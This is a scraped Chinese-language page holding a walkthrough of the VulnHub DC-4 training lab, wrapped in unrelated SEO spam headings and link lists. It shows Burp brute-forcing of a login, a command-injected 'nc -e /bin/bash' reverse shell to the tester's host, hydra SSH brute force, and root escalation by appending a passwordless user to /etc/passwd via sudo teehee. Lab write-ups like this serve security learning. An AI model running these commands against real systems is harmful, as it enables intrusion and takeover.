当前位置: 首页 > news >正文

自己做捕鱼网站能不能挣钱百度seo服务

自己做捕鱼网站能不能挣钱,百度seo服务,奇迹网页游戏排行,七牛云直播项目地址 https://download.vulnhub.com/dc/DC-4.zip实验过程 将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机 使用nmap进行主机发现,获取靶机IP地址 nmap 192.168.47.1-254根据对比可知DC-4的一个ip地址为192.1…

项目地址

https://download.vulnhub.com/dc/DC-4.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知DC-4的一个ip地址为192.168.47.145

扫描DC-4的操作系统,端口及对应服务

nmap -A -p- 192.168.47.145

发现开放22和80端口

访问http://192.168.47.145

发现是个登录界面

尝试使用BP抓包进行爆破

发送到Intruder模块

载入密码字典,开始攻击

对lenth进行排序,发现一个长度异常单位

使用这个密码尝试登录

登录成功

漏洞利用

发现这里可以执行相关命令

可以考虑使用BP篡改数据包来反弹shell

抓包

发现radio可以修改

设置监听
nc -lvvp 8888

反弹shell

注意原数据包空格用+代替的,所以我们也用+来代替

nc+-e+/bin/bash+192.168.47.129+8888

放包

反弹成功

获得交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'

提权

四处翻翻

翻到一份密码字典

一个没权限查看的文件

复制一份内容写进password.txt文件中

使用hydra命令进行爆破
hydra -l jim -P password.txt -t 1 -vV -e ns 192.168.47.145 ssh -o ssh.txt -f ssh://192.168.47.145

爆破出来密码是jibril04

使用ssh连接

连接成功

尝试查看刚才没权限的那个文件
cat /home/jim/mbox

看上去像是收到一封邮件

去var/mail找找
cat /var/mail/jim

通过文件内容得到了charles的密码^xHhA&hvim0y

登录charles账户

登录成功

查看权限

发现charles有teehee命令的权限

使用teehee创建一个root用户
echo "huacha::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

添加成功

切换账户

发现flag.txt在/root目录下

查看flag

http://www.tj-hxxt.cn/news/108387.html

相关文章:

  • 随便建设网站犯法吗国内新闻最新消息今天简短
  • 国外交友网站怎么做seo快速工具
  • 学校做安全台账是哪个网站赛事资讯赛马资料
  • 黔东南购物网站开发设计互联网运营推广是做什么的
  • 网站开站宁波seo推荐推广平台
  • 营销策划案的模板绍兴seo网站优化
  • 免费网站建设公司代理营销渠道策略
  • flash网站做seo优化好不好武汉网络推广优化
  • 做电影网站视频放在那里广告免费发布信息平台
  • 泉州关键词优化seo研究中心道一老师
  • 动漫网站怎么做的新品上市怎么做宣传推广
  • 怎么修改公司网站内容企业推广是什么职业
  • 网站后台流程企业网站定制开发
  • 宿州网站建设设计公司搜索引擎优化的概念
  • 政府网站源码下载郑州seo顾问阿亮
  • 涂料做哪个网站好优化大师下载安装
  • 菏泽机关建设网站广州网站定制多少钱
  • 公司网站建设需要哪些设备电商培训心得
  • 红色门户网站投放广告的渠道有哪些
  • 网站广告开户
  • 国外公司做中国网站百度推广获客方法
  • 网站内容的建设有趣软文广告经典案例
  • 做网站收费 知乎做seo用哪种建站程序最好
  • 做赌博网站是什么案件参考消息网国内新闻
  • 网站搭建素材群新闻头条今日要闻最新
  • 人大网站信息宣传建设北京aso优化
  • 石家庄 外贸网站建设公司seo广告投放是什么意思
  • 做闪图的网站自己怎么免费做网站
  • 可以绑定独立域名网站东莞快速排名
  • 做网站应该选择怎样的公司超级外链工具有用吗